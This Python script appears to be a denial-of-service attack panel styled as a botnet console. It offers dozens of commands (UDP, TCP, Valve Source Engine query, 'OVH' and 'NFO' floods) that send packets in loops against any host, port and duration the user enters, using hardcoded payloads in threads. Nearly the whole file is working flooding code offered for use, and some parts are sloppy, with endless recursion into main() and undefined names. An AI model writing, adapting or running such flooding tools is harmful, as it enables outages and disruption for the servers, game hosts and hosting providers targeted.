#!/usr/bin/env python3 #-*- coding: utf-8 -*- import sys import socket import time import random import threading import getpass import os import urllib import json nicknm = "boti" GameMethods = f""" Games Methods: .VSE Valve Source Engine query flood .ROBLOX Roblox UDP Flood """ methods = f""" List of Methods: L3 Show all L3 Methods L4 Show all L4 Methods AMP Show all Amplification Methods HTTP Show all L7 Methods GAMES Show all Games Methods BOTNET Show all Methods """ showmethods = """ List of Methods: L3 Show all L3 Methods L4 Show all L4 Methods AMP Show all Amplification Methods HTTP Show all L7 Methods GAMES Show all Games Methods BOTNET Show all Methods """ help = """ List of commands: HELP Shows list of commands BOTNET Shows list of botnet methods METHODS Shows Methods List BOTS Shows available zombies TOOLS Shows list of tools CLEAR Clears the screen EXIT Disconnects from the net """ layer4 = """\033[35m L4 Methods: .UDP UDP Flood .TCP TCP Flood .TUP TCP and UDP Flood .SYN TCP SYN flood .HEX HEX Flood .JUNK Junk flood """ banner = """ _____ _ __ _______ ________ / ___/____ (_)___/ /__ _____ / ____/ | / / ____/ \__ \/ __ \/ / __ / _ \/ ___/ / / / |/ / / ___/ / /_/ / / /_/ / __/ / / /___/ /| / /___ /____/ .___/_/\__,_/\___/_/ \____/_/ |_/\____/ /_/ ░ ░ ( Type "help" for Commands ) ( Discord: cirqueira ) """ cookie = open(".sinfull_cookie","w+") fsubs = 0 tpings = 0 pscans = 0 liips = 0 tattacks = 0 uaid = 0 said = 0 running = 0 iaid = 0 haid = 0 aid = 0 attack = True ldap = True http = True atks = 0 def randsender(host, timer, port, punch): global iaid global aid global tattacks global running timeout = time.time() + float(timer) sock = socket.socket(socket.AF_INET, socket.IPPROTO_IGMP) iaid += 1 aid += 1 tattacks += 1 running += 1 while time.time() < timeout and ldap and attack: sock.sendto(punch, (host, int(port))) running -= 1 iaid -= 1 aid -= 1 def stdsender(host, port, timer, payload): global atks global running timeout = time.time() + float(timer) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) atks += 1 running += 1 while time.time() < timeout and attack: sock.sendto(payload, (host, int(port))) sock.sendto(payload, (host, int(port))) sock.sendto(payload, (host, int(port))) sock.sendto(payload, (host, int(port))) sock.sendto(payload, (host, int(port))) sock.sendto(payload, (host, int(port))) sock.sendto(payload, (host, int(port))) sock.sendto(payload, (host, int(port))) atks -= 1 running -= 1 def main(): global fsubs global tpings global pscans global liips global tattacks global uaid global running global atk global ldap global said global iaid global haid global aid global attack global dp while True: bots = (random.randint(32500,41500)) sys.stdout.write("\x1b]2;boti. | Devices: [{}] | Spoofed Servers [19] | Server Units [8] | Clients: [18]\x07".format (bots)) sin = input("\033[32m[\033[35m{}\033[32m@Joker]\033[36m$ \033[96m".format(nicknm)).lower() sinput = sin.split(" ")[0] if sinput == "clear": os.system (" clear") print (banner) main() if sinput == "cls": os.system ("clear") print (banner) main() elif sinput == "?": os.system ("clear") print (banner) main() elif sinput == "layer4": os.system ("clear") print (layer4) main() elif sinput == "showMethods": os.system ("clear") print (showMethods) main() elif sinput == "showMethods": os.system ("clear") print (showMethods) main() elif sinput == "methods": os.system ("clear") print (methods) main() elif sinput == "help": os.system ("clear") print (help) main() elif sinput == "admin_commands": os.system ("clear") print (raw) main() elif sinput == "": main() elif sinput == "exit": os.system ("clear") exit() elif sinput == "std": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x73\x74\x64\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "dns": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "ovh": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x02\x00\x2f" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "vse": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\xff\xff\xff\xffTSource Engine Query\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "syn": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "tcp": try: if running >= 9999: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 4096 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "homeslap": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 2048 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "udp": try: if running >= 99999: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 1460 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "killallv2": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 1460 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "killallv3": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 1460 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "udprape": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 0 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "udprapev2": try: if running >= 9999: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 65500 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == ".UDP": try: if running >= 9999: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 65500 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == ".HTTPIO": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 1024 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == ".TCP": try: if running >= 9999: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) pack = 10000 punch = random._urandom(int(pack)) threading.Thread(target=randsender, args=(host, timer, port, punch)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "nfodrop": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "ovhnat": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "ovhamp": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\xff\xff\xff\xffTSource Engine Query\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "nfocrush": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\xff\xff\xff\xffTSource Engine Query\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "greeth": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\xff\xff\xff\xffTSource Engine Query\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "telnet": try: if running >= 99999: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "ovhkill": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "ovhdown": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "ssdp": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "hydrakiller": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "nfonull": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "killall": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x00\x02\x00\x2f" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "ovhslav": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "cpukill": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "tcprape": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "nforape": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\xff\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x20\x30\x20\x22" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "udpraw": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\0\x14\0\x01\x03" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "tcpraw": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x55\x55\x55\x55\x00\x00\x00\x01" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "hexraw": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x55\x55\x55\x55\x00\x00\x00\x01" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "stdraw": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x1e\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "vseraw": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x01\x01\x00\x01\x55\x03\x6f\x03\x1c\x03\x00\x00\x14\x14" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "synraw": try: if running >= 1: print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.") main() else: sinput, host, timer, port = sin.split(" ") socket.gethostbyname(host) payload = b"\x01\x01\x00\x01\x55\x03\x6f\x03\x1c\x03\x00\x00\x14\x14" threading.Thread(target=stdsender, args=(host, port, timer, payload)).start() print("\033[97mYour Attack Has Been Launched!") except ValueError: main() except socket.gaierror: main() elif sinput == "stopattacks": attack = False while not attack: if aid == 0: attack = True elif sinput == "stop": attack = False while not attack: if aid == 0: attack = True else: main() try: clear = "clear" os.system(clear) print(banner) main() except KeyboardInterrupt: exit()